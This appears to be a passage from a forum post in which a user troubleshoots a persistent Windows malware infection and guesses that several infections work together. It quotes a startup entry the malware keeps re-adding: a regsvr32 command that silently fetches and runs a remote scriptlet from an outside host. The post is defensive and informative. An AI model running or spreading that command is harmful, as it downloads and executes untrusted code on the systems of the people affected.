I've been having fun for days wrestling with this, myself. I still don't think I've got it all.
First, and most importantly, before any reboot (even in Safe Mode), check MSCONFIG. In the StartUp tab, it keeps adding this;
regsvr32 /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
The URL doesn't actually work, but I don't think that's the point.
My theory is that this is actually a combination of viruses (in the general sense of the word, including worms, malware, rootkits, bootsector virusus, etc.). My further theory is that they all work together to keep each other activate